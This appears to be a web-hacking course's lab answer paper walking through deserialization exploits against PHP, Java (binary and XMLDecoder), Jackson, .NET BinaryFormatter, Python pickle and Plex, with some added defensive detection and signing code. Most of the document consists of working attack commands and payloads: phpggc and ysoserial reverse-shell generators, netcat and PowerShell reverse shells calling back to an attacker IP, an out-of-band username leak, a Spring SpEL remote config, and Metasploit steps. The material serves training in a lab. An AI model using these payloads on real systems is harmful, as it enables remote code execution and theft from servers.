Step 4: To carry out the attack we need to modify the serialized object, which requires knowing the correct class name and property names of the object being serialized. Viewing the HTML source of the page reveals a commented-out class definition, used for referencing the file, as shown below.

Step 5: Now modify the serialized object so that it references a different file, “/etc/passwd” for this challenge, as shown below. The modification must follow PHP's serialization format: in particular the length prefix in s:N:"..." must equal the byte length of the new string, or unserialize() will reject the payload.


Step 6: Base64-encode the modified object, paste it as the value of the file parameter and send the request. The server deserializes the modified PHP object and reads the “/etc/passwd” file, as shown below.
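A small PHP serializer and length checker, added here as a Python example (not course material). It produces the format edited by hand in Step 5 and enforces the one rule hand edits get wrong, the byte-length prefix on strings; "refund.html" and "/etc/passwd" happen to both be 11 bytes, which is why a naive edit works in this exercise and would not for most other paths. The class name FileReader and the property name file are placeholders: the real names come from the commented-out class in the page source.

```python
import base64
import re


class PhpObject:
    """A PHP object to serialize: class name plus its public properties."""
    def __init__(self, cls, props):
        self.cls, self.props = cls, props


def php_serialize(v):
    """Subset of PHP serialize(): null, bool, int, str, list/dict, objects.
    String and class-name lengths count UTF-8 bytes, not characters."""
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return "b:%d;" % v
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v.encode("utf-8")), v)
    if isinstance(v, (list, tuple)):
        v = dict(enumerate(v))
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return "a:%d:{%s}" % (len(v), body)
    if isinstance(v, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(v.cls.encode("utf-8")), v.cls, len(v.props), body)
    raise TypeError("unsupported type %r" % type(v))


def file_param(path, cls="FileReader", prop="file"):
    """Base64 value for the vulnerable `file` parameter. The class and property
    names are placeholders; take the real ones from the commented-out class."""
    payload = php_serialize(PhpObject(cls, {prop: path})).encode("utf-8")
    return base64.b64encode(payload).decode()


_STR = re.compile(rb's:(\d+):"')


def lint_string_lengths(serialized):
    """Check every s:N:"..." has exactly N bytes before the closing `";`.
    Returns (ok, [(offset, declared_len), ...]) listing the ones that do not.
    A linear scan, so an s:N:" inside string content can confuse it."""
    bad = []
    for m in _STR.finditer(serialized):
        n = int(m.group(1))
        if serialized[m.end() + n:m.end() + n + 2] != b'";':
            bad.append((m.start(), n))
    return not bad, bad


def decode_file_param(value):
    """Base64-decode a `file` value and lint it, as one would before sending."""
    raw = base64.b64decode(value)
    return raw, lint_string_lengths(raw)[0]
```

The server-side fix is not to accept serialized objects from the client at all: reference the document by an opaque id looked up in an allowlist, and if serialization is unavoidable, sign the blob (HMAC) and verify before unserialize(), or use a data-only format such as JSON.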


PHP Deserialization Attack


Challenge URL: http://slim.webhacklab.com:8081

• Identify and exploit the PHP Deserialization vulnerability.
• Get a reverse shell and extract the system information such as username, OS type from the server.

Solution:
Step 1: Navigate to the “http://slim.webhacklab.com:8081/” and provide the details such as first
name, last name and mobile number and email address:


Step 2: Intercepting the request and Base64-decoding the value of the “csrftoken” parameter shows PHP serialized data:

Step 3: Open a terminal and run phpggc, located in ‘/root/tools/phpggc/’. The command to generate a Base64-encoded (-b) PHP serialized payload for the Slim gadget chain that executes the command “id” is:

root@Kali:~/tools/phpggc# ./phpggc -b slim/rce1 system id


Step 4: Provide the base64 encoded payload retrieved from above step to parameter “csrftoken”
and submit the request. On successful execution, the application reveals the output of the “id”
command

Step 5: In order to take a reverse shell open the terminal and start a listener:

root@Kali:~# nc -nlvp 9999


Step 6: Create a PHP serialized payload that spawns a reverse shell with the command:

root@Kali:~/tools/phpggc# ./phpggc -b slim/rce1 system "ncat 192.168.4.X 9999 -e /bin/bash"

Step 7: Provide the base64 encoded payload retrieved from above step to parameter “csrftoken”
and submit the request.


Step 8: On successful execution the server connects back to the listener with a shell, from which commands can be executed.


Java Deserialization Attack - Binary


Challenge URL: http://mblog.webhacklab.com/login

• Identify and inject a payload into the serialised data to make the host send DNS
requests to an external host.
• Get a reverse shell and extract the system information such as usernames, OS type
from the server and also read “/etc/passwd” file.

Solution:
Step 1: Login into the application with “Remember Me” checked.


Step 2: Observe a new cookie named “rememberMe” being set in the response to the login request.

Note: The value of the “rememberMe” cookie starts with “rO0AB”, which is the Base64 encoding of the Java serialization stream header (magic 0xACED, version 0x0005). That marks the value as a Java serialized object.

Step 3: Start “tcpdump” on your kali VM to dump dns requests, using the following command:

tcpdump -n udp port 53 -i any

Step 4: Generate the payload with “ysoserial-master.jar”, using the CommonsCollections4 gadget chain to run a DNS lookup, with the command below (tr strips the line breaks base64 inserts so the value fits in a single cookie):

root@Kali:~/tools# java -jar ysoserial-master.jar CommonsCollections4 'nslookup foo.userX.webhacklab.com' | base64 | tr -d "\n"


Step 5: Copy the payload generated in the step above, paste it in full into the "rememberMe" cookie,
and send the request to observe command execution on the server.

Step 6: As can be seen from the screenshot below, we received domain resolution requests on our
internal Kali host, confirming command execution.

Step 7: Generate the reverse shell payload using the 'ysoserial-master.jar' tool with the following
command:

root@Kali:~/tools# java -jar ysoserial-master.jar CommonsCollections4 'nc -e /bin/sh 192.168.4.X 9898' | base64 | tr -d "\n"

Step 8: Start a netcat listener to wait for the reverse shell.

Step 9: Copy the payload generated in the step above, paste it in full into the "rememberMe" cookie,
and send the request to observe command execution on the server.

Step 10: As can be seen from the screenshot below, we received a reverse shell on our internal Kali
host, confirming command execution.

Bonus: Tricky Java Deserialization Attack - Binary

Challenge URL: http://mblognew.webhacklab.com/login

• Identify and inject a payload into the serialised data to make the host send DNS
requests to an external host.
• Get a reverse shell and extract system information such as usernames, OS type from
the server and also read the ‘/etc/passwd’ file.

Solution:
Step 1: Register with the application, navigate to the login page, provide the credentials, tick the
'Remember Me' checkbox and click the submit button.

Step 2: Once you have successfully logged in to the application, navigate to any of the tabs 'Home',
'Profile', 'Notification' or 'Settings'.

Step 3: Capture the HTTP request in Burp Suite and observe the 'rememberMe' cookie value, which
contains Base64-encoded data.

Step 4: The cookie contains unreadable data, but when its value is Base64 decoded it appears as
shown in figure.

Note: Always try different encoding and encryption mechanisms when you encounter Base64 data of
this kind.

Step 5: Using the 'Hackvertor' Burp Suite extension, observe that the application Base64 decodes the
value and then decompresses it using deflate to obtain the Java serialized object, as shown in figure:
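
Step 2 of the previous challenge noted that the cookie begins with "rO0AB" (the Base64 form of the Java stream magic 0xACED), and this step shows the same kind of object carried Base64-encoded and deflate-compressed. The following Python is an added example, not part of the answer paper or of the lab application, written from the defender's side: it decodes a cookie either way, reads the top-level class name and serialVersionUID from the stream's class descriptor, and flags any class other than the one the application expects. The class name com.example.web.RememberMePrincipal, both serialVersionUIDs and all cookie values are constructed for the demo.

```python
import base64
import struct
import zlib

# Constants from the Java Object Serialization Stream Protocol.
STREAM_MAGIC = b"\xac\xed"     # Base64-encodes to the "rO0AB" prefix seen in the cookie
STREAM_VERSION = 5
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70
SC_SERIALIZABLE = 0x02

# Hypothetical class the application itself legitimately stores in the cookie.
EXPECTED_CLASS = "com.example.web.RememberMePrincipal"


def decode_cookie(value):
    """Base64-decode a cookie value and, if the result is a zlib/DEFLATE stream
    (Java's DeflaterOutputStream writes the 0x78 zlib header byte), inflate it."""
    raw = base64.b64decode(value, validate=True)
    if raw[:1] == b"\x78":
        raw = zlib.decompress(raw)
    return raw


def parse_class_descriptor(raw):
    """Return (class_name, serialVersionUID) for the top-level object of a Java
    serialization stream, or None if the bytes are not such a stream."""
    if len(raw) < 8 or raw[:2] != STREAM_MAGIC:
        return None
    (version,) = struct.unpack(">H", raw[2:4])
    if version != STREAM_VERSION or raw[4] != TC_OBJECT or raw[5] != TC_CLASSDESC:
        return None  # strings, arrays and back-references at top level are out of scope here
    (name_len,) = struct.unpack(">H", raw[6:8])
    if len(raw) < 16 + name_len:
        return None
    name = raw[8:8 + name_len].decode("utf-8")
    (uid,) = struct.unpack(">q", raw[8 + name_len:16 + name_len])
    return name, uid


def inspect_cookie(value, expected_class=EXPECTED_CLASS):
    """Classify a cookie: ('not-serialized', None, None) for opaque tokens,
    ('ok', name, uid) when the serialized class is the expected one, and
    ('alert', name, uid) when any other class is about to be deserialized."""
    try:
        raw = decode_cookie(value)
    except (ValueError, zlib.error):   # bad Base64 (binascii.Error is a ValueError) or bad zlib data
        return "not-serialized", None, None
    desc = parse_class_descriptor(raw)
    if desc is None:
        return "not-serialized", None, None
    name, uid = desc
    return ("ok" if name == expected_class else "alert"), name, uid


def build_sample_stream(class_name, uid):
    """Construct the bytes of a Java serialization stream holding one object with
    no fields (constructed sample data, not captured from any application)."""
    name = class_name.encode("utf-8")
    return (STREAM_MAGIC + struct.pack(">H", STREAM_VERSION)
            + bytes([TC_OBJECT, TC_CLASSDESC])
            + struct.pack(">H", len(name)) + name
            + struct.pack(">q", uid)
            + bytes([SC_SERIALIZABLE]) + b"\x00\x00"    # classDescFlags, zero fields
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))          # no class annotation, no superclass


# Constructed cookie values. Both serialVersionUIDs are made-up numbers, not the
# real ones for these classes.
SAMPLE_COOKIES = {
    "legit": base64.b64encode(build_sample_stream(EXPECTED_CLASS, 1)).decode(),
    "legit_deflated": base64.b64encode(
        zlib.compress(build_sample_stream(EXPECTED_CLASS, 1))).decode(),
    "unexpected": base64.b64encode(
        build_sample_stream("org.apache.commons.beanutils.BeanComparator", 0x0102030405060708)).decode(),
    "opaque": base64.b64encode(b"just-a-random-session-token").decode(),
}

if __name__ == "__main__":
    for label, cookie in SAMPLE_COOKIES.items():
        print(label, cookie[:12], inspect_cookie(cookie))
```

A check like this belongs in front of the deserializer, or in request logging, as a detection control: an unexpected top-level class in a remember-me cookie is a strong indicator of tampering. The fix itself is not to deserialize client-controlled bytes at all, or to enforce an allow-list of classes with an ObjectInputFilter, since the whole stream is under the client's control.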

Step 6: To generate a compressed Java deserialization payload, the original ysoserial source code
must be modified. To do that, download the Git repository from the following link using the command
below.

Source: https://github.com/frohoff/ysoserial

Git command: git clone https://github.com/frohoff/ysoserial.git

Step 7: The ysoserial build instructions show that the project is built with Maven, so the Maven
binary distribution is required to compile the ysoserial source code, as shown in figure:

Step 8: Download the latest Maven binaries from the download link given and extract them using the
following command:

Download link: https://maven.apache.org/download.cgi

Latest version at the time of writing:

https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

Command: tar xzvf apache-maven-3.6.3-bin.tar.gz

Step 9: In order to generate the compressed ysoserial deserialization payload, modify the
'src/main/java/ysoserial/GeneratePayload.java' file as shown in figure:

Code Change 1:
import java.util.zip.DeflaterOutputStream;
import java.util.Base64;   // required by compressObject() below; add it if the file does not already import it
import java.io.*;

Code Change 2:
System.out.println(compressObject(object));
Then comment out the next three statements by wrapping them in a block comment (/* ... */) so they
are no longer executed.

Code Change 3:
public static String compressObject(Object obj) throws IOException {
    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
    // Deflate-compress the serialized object, matching the format the application expects
    OutputStream mCompressdos = new DeflaterOutputStream(byteArrayOutputStream);
    ObjectOutputStream mOutputStream = new ObjectOutputStream(mCompressdos);
    mOutputStream.writeObject(obj);
    mOutputStream.close();
    mCompressdos.close();
    // Base64-encode the compressed bytes so they can be placed in the cookie
    return new String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray()));
}

Step 10: Once the source code is modified, compile it using the following Maven command as
shown in figure:

Command: mvn clean package -DskipTests

Step 11: Start a tcpdump listener to capture DNS requests.

root@Kali:~# tcpdump -n udp port 53 -i any

Step 12: Once compilation succeeds, a new 'target' folder is created. Navigate to the 'target' folder
and generate the ysoserial payload with the following command, as also shown in figure:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'nslookup deserialize.userX.webhacklab.com'

Step 13: Add the generated payload to the 'rememberMe' cookie, forward the request, and observe
that the application responds with a 'serialVersionUID mismatch' error, as shown in figure:

Step 14: The following bash script fetches the 'serialVersionUID' of a given class from all the
available versions of a library, here 'commons-beanutils'.

#!/bin/bash
# Download every zip distribution listed at $url, unpack it, and print the
# serialVersionUID of $class from each jar it contains, using the JDK's serialver tool.
#
# Example usage: ./getSUIDs.sh https://archive.apache.org/dist/commons/beanutils/binaries/ org.apache.commons.beanutils.BeanComparator
# Example2 usage: ./getSUIDs.sh https://archive.apache.org/dist/commons/collections/binaries/ org.apache.commons.collections4.functors.InvokerTransformer

url=$1
class=$2

mkdir -p tmpjars
for zip in $(curl -s "$url" | grep '.zip<' | grep -Eo 'href="[^"]+"' | cut -d '"' -f 2); do
    wget -O tmpjars/current.zip -4 "$url$zip" --no-check-certificate &>/dev/null
    unzip tmpjars/current.zip -d tmpjars &>/dev/null

    echo "Checking file: $zip"

    # serialver prints the UID for the class; versions that share a UID are indistinguishable here
    for jar in $(find tmpjars/ -name '*.jar'); do
        serialver -classpath "$jar" "$class" 2>/dev/null | grep serialVersionUID
    done

    rm -rf tmpjars/*
done
rm -d tmpjars/

Step 15: After executing the script, observe that the application might be using commons-beanutils
v1.7.0 to 1.8.3, whereas the latest ysoserial is built against 'commons-beanutils v1.9.2', as shown in
figure:

root@Kali:~/tools# chmod a+x getSUIDs.sh

root@Kali:~/tools# ./getSUIDs.sh https://archive.apache.org/dist/commons/beanutils/binaries/ org.apache.commons.beanutils.BeanComparator

Step 16: Navigate to the ysoserial source code, modify 'pom.xml' to change the 'commons-beanutils'
version from '1.9.2' to '1.7.0', and compile the ysoserial source code again, as shown in figure:

Step 17: Generate the deserialization payload again using the same command, as shown in figure:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'nslookup deserialize.userX.webhacklab.com'

Step 18: Add the generated payload in 'rememberMe' cookie as shown in figure:

Step 19: The payload is executed successfully and the DNS request is received by the tcpdump
listener started in Step 11, as shown in figure:

Step 20: Generate the reverse shell payload using the rebuilt ysoserial jar with the following
command:

root@Kali:~/ysoserial/target# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'nc -e /bin/sh 192.168.4.X 9898'

Step 21: Start a netcat listener to wait for the reverse shell:

root@Kali:~# nc -nlvp 9898

Step 22: Copy the payload generated in the step above, paste it in full into the "rememberMe" cookie,
and send the request to observe command execution on the server.

Step 23: As can be seen from the screenshot below, we received a reverse shell on our internal Kali
host, confirming command execution.

Java Deserialization Attack - XML

Challenge URL: http://mblog.webhacklab.com/api/add/microblog

• Identify the request to inject XML serialised data and inject a payload into it to make
the host send ping requests to an external host.
• Get a reverse shell and extract the system information such as username, OS type
from the server and also read “/etc/passwd” file.

Solution:
Step 1: Log in to the Microblog and post a blog.

Step 2: Observe the request. It’s a simple REST API request which adds the content.

Step 3: In the source code we get some hints about the new update.

Step 4: Modify the request to check whether the server accepts XML as input. Java web frameworks
use the XStream or XMLDecoder libraries to convert HTTP request parameters to objects through a
process called deserialization, which may lead to remote code execution. In the screenshot below,
when we changed our request to XML, the application returned an XML parsing error, which hints that
the HTTP request body is being parsed as XML.

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7" class="java.beans.XMLDecoder">
  <object class="awh.notsosecure.mblog.web.forms.MicroblogForm">
    <void property="content">
      <string>test</string>
    </void>
  </object>
</java>

Step 5: Start capturing DNS traffic using tcpdump.

tcpdump -n udp port 53 -i any

Step 6: Let’s send the following XML to the application. The XStream parser will try to deserialize
the object and execute the java.lang.Runtime class, giving us remote code execution:

<?xml version="1.0" encoding="UTF-8"?>
<object class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="2">
    <void index="0">
      <string>nslookup</string>
    </void>
    <void index="1">
      <string>spam1234.userX.webhacklab.com</string>
    </void>
  </array>
  <void method="start" />
</object>

Step 7: As can be seen from the screenshot below, we received a DNS request for domain resolution
on our authoritative domain “userX.webhacklab.com”, confirming command execution.

tcpdump -n udp port 53 -i any

Step 8: Start to listen on any port, let’s say 9999.

root@Kali:~# nc -nvlp 9999

Step 9: If we send the following XML file to the application, the XStream parser will try to deserialize
the object and execute our command “nc -e /bin/sh 192.168.4.X 9999”.

<?xml version="1.0" encoding="UTF-8"?>
<object class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="5">
    <void index="0">
      <string>nc</string>
    </void>
    <void index="1">
      <string>-e</string>
    </void>
    <void index="2">
      <string>/bin/sh</string>
    </void>
    <void index="3">
      <string>192.168.4.X</string>
    </void>
    <void index="4">
      <string>9999</string>
    </void>
  </array>
  <void method="start" />
</object>

Step 10: As can be seen from the screenshot below, we can access the system through the reverse
shell and execute commands.

Jackson JSON Deserialization Attack

Challenge URL: http://mblog.webhacklab.com/mblog/api/add/microblog

• Get a reverse shell and extract the system information such as username, OS type
from the server and also read “/etc/passwd” file.

Solution:
Step 1: Log in to the Microblog, post a blog, and intercept the request in Burp.

Step 2: Observe the request. It is a simple REST API request which adds the content.

Step 3: Break the JSON format by simply removing the last double quote (") after "Test", as shown
below, and observe the error. This looks like a JSON serialized string.

Note: From the error we can observe that the Jackson databind library is being used. This library is
vulnerable to JSON deserialization attacks.

Step 4: The most common framework in Java applications is Spring, and if we feed the JSON below to
a Jackson parser it will try to load a Spring configuration (ApplicationContext) file over the network.

["org.springframework.context.support.FileSystemXmlApplicationContext",
"http://192.168.4.X:80/spel.xml"]

Step 5: Within this configuration file we can embed SpEL (Spring Expression Language), which can
execute code. So let’s host the spel.xml file below on our Kali machine and send the JSON request of
Step 4 to the application:

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
         http://www.springframework.org/schema/beans
         http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder">
    <constructor-arg>
      <array>
        <value>nc</value>
        <value>192.168.4.X</value>
        <value>4444</value>
        <value>-e</value>
        <value>/bin/bash</value>
      </array>
    </constructor-arg>
    <property name="whatever" value="#{ pb.start() }"/>
  </bean>
</beans>

root@Kali:~/tools# python3 -m http.server 80

Step 6: Start a netcat listener:

root@Kali:~# nc -nvlp 4444

Step 7: Observe the request on the python web server

Step 8: On successful execution we get the reverse shell as shown below

.NET Serialization Attack

Challenge URL: http://admin.webhacklab.com

• Identify and exploit the .Net Deserialization vulnerability to make the host send DNS
requests to an external host.
• Get a reverse shell and extract the system information such as username, OS type
from the server and read “win.ini” file.

Solution:
Step 1: Navigate to the http://admin.webhacklab.com URL and intercept the response in Burp.

Step 2: There is a Base64-encoded cookie named “__NSSTemp” whose value begins
“AAEAAAD/////AQAAA”, which indicates that serialized data is being exchanged.
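
The “AAEAAAD/////AQAAA” prefix is the Base64 form of the BinaryFormatter stream header, just as “rO0AB” is the Base64 form of the Java stream magic, a PHP serialized object begins O:<length>:"<class>", and a pickle of protocol 2 or later begins with the byte 0x80. The following Python is an added example, not part of the answer paper or of the lab, showing how a defender's request filter or log-enrichment step can label parameters that carry a serialized object in any of the formats covered in this module (PHP, Java binary, Java XMLDecoder XML, Jackson polymorphic JSON, .NET BinaryFormatter, Python pickle). The parameter names and values are constructed; the XML sample is the benign MicroblogForm request from the XML challenge, and the URL in the JSON sample is a placeholder.

```python
import base64
import binascii
import json
import pickle
import re

JAVA_MAGIC = b"\xac\xed\x00\x05"
# BinaryFormatter SerializationHeaderRecord: record type 0, RootId 1, HeaderId -1, version 1.0
DOTNET_HEADER = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"
PICKLE_PROTO = b"\x80"   # PROTO opcode that opens every pickle of protocol 2 or later

PHP_OBJECT_RE = re.compile(r'^[OC]:\d+:"[^"]+":\d+:\{')
XMLDECODER_RE = re.compile(r'java\.beans\.XMLDecoder|<object\s+class="[\w.$]+"')
FQCN_RE = re.compile(r'^(?:[A-Za-z_$][\w$]*\.){2,}[A-Za-z_$][\w$]*$')
BASE64_RE = re.compile(r'^[A-Za-z0-9+/]{8,}={0,2}$')


def _maybe_base64(text):
    """Decode text as Base64 if it is plausibly Base64, else return None."""
    if not BASE64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True)
    except binascii.Error:
        return None


def _classify_json(text):
    """Flag the two shapes Jackson uses for polymorphic (default-typing) input."""
    try:
        doc = json.loads(text)
    except ValueError:
        return None
    if isinstance(doc, list) and len(doc) >= 2 and isinstance(doc[0], str) and FQCN_RE.match(doc[0]):
        return "jackson-polymorphic-type"   # ["fully.qualified.ClassName", value]
    if isinstance(doc, dict) and ("@class" in doc or "@type" in doc):
        return "jackson-polymorphic-type"   # {"@class": "...", ...}
    return None


def classify(value):
    """Return a label naming the serialization format a parameter value appears to
    carry, or None when it looks like ordinary data."""
    text = value.strip()
    if PHP_OBJECT_RE.match(text):
        return "php-serialized-object"
    if XMLDECODER_RE.search(text):
        return "java-xmldecoder"
    label = _classify_json(text)
    if label:
        return label
    raw = _maybe_base64(text)
    if raw is None:
        return None
    if raw.startswith(JAVA_MAGIC):
        return "java-serialized-object"
    if raw.startswith(DOTNET_HEADER):
        return "dotnet-binaryformatter"
    if raw.startswith(PICKLE_PROTO):
        return "python-pickle"
    if PHP_OBJECT_RE.match(raw.decode("latin-1")):
        return "php-serialized-object"
    return None


def scan_request(params):
    """Map each flagged parameter name to its label, for logging or blocking."""
    findings = {}
    for name, value in params.items():
        label = classify(value)
        if label:
            findings[name] = label
    return findings


# Constructed request parameters, one per format plus two benign values.
SAMPLE_REQUEST = {
    "csrftoken": base64.b64encode(b'O:8:"stdClass":1:{s:1:"a";i:1;}').decode(),
    "rememberMe": base64.b64encode(JAVA_MAGIC + b"\x73\x72").decode(),
    "__NSSTemp": base64.b64encode(DOTNET_HEADER + b"\x00\x00\x00\x00").decode(),
    "title": base64.b64encode(pickle.dumps({"subject": "hello"})).decode(),
    "body_json": '["org.springframework.context.support.FileSystemXmlApplicationContext", '
                 '"http://example.invalid/spel.xml"]',
    "body_xml": ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<java version="1.7" class="java.beans.XMLDecoder">'
                 '<object class="awh.notsosecure.mblog.web.forms.MicroblogForm">'
                 '<void property="content"><string>test</string></void></object></java>'),
    "content": "Hello world, this is a normal post",
    "session": base64.b64encode(b"opaque-session-token-0001").decode(),
}

if __name__ == "__main__":
    for name, label in scan_request(SAMPLE_REQUEST).items():
        print(f"{name}: {label}")
```

The labels are evidence that a parameter is consumed by a deserializer, which is what a code review should then chase: a session or CSRF token never needs to be a serialized object, and a REST endpoint that accepts Jackson default typing or XMLDecoder input from the client carries the weakness whether or not a gadget chain for its classpath is currently known.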

Step 3: Now, on a Windows system, generate the serialized payload using the ysoserial.net tool so
that the server sends an out-of-band request containing the web server username to an
attacker-controlled domain:

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "powershell.exe Invoke-WebRequest -Uri http://192.168.4.X:8888/$env:UserName"

Alternative: you can use the web utility located at http://utility.webhacklab.com/YSoSerial.aspx to
generate the payloads with the same command:

powershell.exe Invoke-WebRequest -Uri http://192.168.4.X:8888/$env:UserName

Step 4: Start the python server to get an Out Of Band Call.

root@Kali:~/tools# python3 -m http.server 8888

Step 5: Replace the serialized string in “__NSSTemp” cookie with the value generated in Step 3
and send a request.

Step 6: We get the OOB request along with the web server’s machine name.

Step 7: To get the reverse shell, start a netcat listener on the Kali host.

root@Kali:~/tools# nc -nlvp 4444

Step 8: Generate the reverse shell payload using the terminal or the web interface, with the following command:

powershell.exe \"$client = New-Object System.Net.Sockets.TCPClient('192.168.4.X',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"

Step 9: Replace the serialized string in the “__NSSTemp” cookie with the value generated in Step 8
and send the request.

Step 10: We get a reverse shell and can run the commands.

Step 11: The result of “ipconfig” command.

Step 12: The result of “whoami”

Step 13: The result of “win.ini”

Python Serialization Attack

Challenge URL: http://reimbursement.webhacklab.com/Support/AddTicket

• Identify and exploit the Python Deserialization vulnerability to make the host send
DNS requests to an external host.
• Get a reverse shell and extract the system information such as username, OS type
from the server and read “/etc/passwd” file

Solution:
Step 1: Go to the Support section of the application and select Add Ticket.

Step 2: Fill up the support request and upload a sample text file ‘test.txt’ and intercept the request in
Burp.

Note: Make sure that the txt file has some content. Application will not allow empty file upload.

Step 3: There are two parameters that send data in a Base64 encoded value as highlighted below:

Step 4: Enter any invalid character as value in the ‘title’ parameter to check the error in response.

Step 5: Use the python_deser_oob.py script available on the Kali machine to generate a Python
deserialization payload that triggers an out-of-band call, as shown below:

Command:

root@Kali:~/tools/python_deserialization# python3 python_deser_oob.py testing.userX.webhacklab.com

Step 6: Start a Tcpdump listener for an OOB call:

tcpdump -n udp port 53 -i any

Step 7: Replace the value in ‘title’ parameter with generated payload as shown below.

Step 8: An OOB call will be received.

Step 9: Generate the payload for the reverse shell using the following command.

root@Kali:~/tools/python_deserialization# python3 python_deser_shell.py 192.168.4.X 4444

Step 10: Start a netcat listener on the port given to the script:

root@Kali:~# nc -nlvp 4444

Step 11: Enter the generated payload in the ‘title’ parameter and send the Request.

Step 12: A reverse shell is obtained, and we can run commands.

Step 13: Execute ‘cat /etc/passwd’ to complete the challenge.

cat /etc/passwd
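
The ‘title’ parameter in this challenge is accepted by the application as Base64-encoded pickle data supplied by the client, which is the root cause: pickle.loads instantiates whatever the stream names. As an added example, not part of the answer paper or of the reimbursement application, the following Python shows the two controls a defender applies when the format cannot simply be replaced by JSON: authenticate the blob with an HMAC before any opcode is interpreted, and unpickle through a find_class allow-list so that even a correctly signed stream cannot resolve arbitrary globals. The key, the ticket content and the allow-list are constructed for the demo.

```python
import base64
import collections
import datetime
import hashlib
import hmac
import io
import pickle

# Constructed demo key; a real deployment keeps this in a secret store and rotates it.
DEMO_KEY = b"constructed-demo-key-do-not-reuse"
TAG_LEN = hashlib.sha256().digest_size


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only explicitly allow-listed globals.

    Containers and scalars (dict, list, str, int, ...) are pure opcodes and never
    reach find_class; every class or callable reference does, and is rejected
    unless it is listed here."""
    ALLOWED = {("collections", "OrderedDict")}   # constructed allow-list for the demo

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def seal(obj, key=DEMO_KEY):
    """Server side: serialize an object the server built itself and prepend an
    HMAC-SHA256 tag, so the client cannot substitute its own pickle."""
    body = pickle.dumps(obj)
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(tag + body).decode()


def unseal(token, key=DEMO_KEY):
    """Verify the tag over the raw bytes before a single opcode is interpreted,
    then load through the restricted unpickler as defence in depth."""
    raw = base64.b64decode(token)
    tag, body = raw[:TAG_LEN], raw[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature")
    return restricted_loads(body)


def load_status(token, key=DEMO_KEY):
    """Report what happens to a token: 'ok', 'bad-signature' or 'forbidden-global'."""
    try:
        unseal(token, key)
        return "ok"
    except ValueError:                 # covers malformed Base64 as well as a failed tag check
        return "bad-signature"
    except pickle.UnpicklingError:
        return "forbidden-global"


def tamper(token):
    """Flip one bit in the pickle body while leaving the tag untouched."""
    raw = bytearray(base64.b64decode(token))
    raw[-1] ^= 0x01
    return base64.b64encode(bytes(raw)).decode()


# Constructed sample data.
TICKET = {"title": "Laptop reimbursement", "amount": 120}
SAMPLE_TOKEN = seal(TICKET)                       # what the server would hand to the browser
TAMPERED_TOKEN = tamper(SAMPLE_TOKEN)             # body modified, tag left intact
UNSIGNED_TOKEN = base64.b64encode(pickle.dumps({"title": "x"})).decode()   # raw pickle, no tag
FOREIGN_CLASS_TOKEN = seal(datetime.date(2021, 1, 1))   # validly signed, names a class outside the allow-list
ORDERED_PICKLE = pickle.dumps(collections.OrderedDict(a=1))   # allow-listed class, loads normally

if __name__ == "__main__":
    for label, token in [("genuine", SAMPLE_TOKEN), ("tampered", TAMPERED_TOKEN),
                         ("unsigned", UNSIGNED_TOKEN), ("foreign class", FOREIGN_CLASS_TOKEN)]:
        print(label, "->", load_status(token))
```

Note the order of operations in unseal: the tag is checked over the raw bytes first, so an unsigned or modified blob never reaches the unpickler at all, and the restricted loader only comes into play if the signing key leaks or the server itself signs something it should not.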

Bonus: Plex Python Deserialization

Challenge URL: http://plex.webhacklab.com:32400

• Perform RCE using python deserialization vulnerability.

Solution:
Step 1: Navigate to the application as shown in figure:

Step 2: Log in to the application with the admin user account, as shown in figure:

Step 3: Navigate to browser inspector tab as shown in figure:

Step 4: Navigate to Storage -> Local Storage and select the "http://plex.webhacklab.com:32400"
and copy the "myPlexAccessToken" value as shown in figure:

Step 5: Use the following Metasploit module and set the options shown to obtain a reverse shell.

root@Kali:~# msfconsole

msf > use exploit/windows/http/plex_unpickle_dict_rce

msf exploit(handler) > set PLEX_TOKEN myPlexToken

msf exploit(handler) > set RHOSTS 192.168.200.130

msf exploit(handler) > set LHOST 192.168.4.X

msf exploit(handler) > set LPORT <PORT>

msf exploit(handler) > run

Step 6: The meterpreter session is opened.

Step 7: Obtain the system information and the output of ipconfig.

Ruby/ERB Template Injection

